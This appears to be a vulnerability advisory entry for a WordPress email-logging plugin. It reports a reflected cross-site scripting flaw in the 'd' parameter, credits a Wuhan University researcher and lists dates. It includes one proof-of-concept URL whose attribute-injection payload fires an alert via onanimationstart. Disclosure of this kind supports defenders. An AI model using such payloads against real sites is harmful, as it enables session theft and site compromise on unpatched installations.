The plugin does not escape the d parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
With the "Enable Logs" setting activated: https://example.com/wp-admin/admin.php?page=check-email-logs&d="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-11-01 (about 1 years ago)
2021-11-01 (about 1 years ago)
2022-09-26 (about 4 months ago)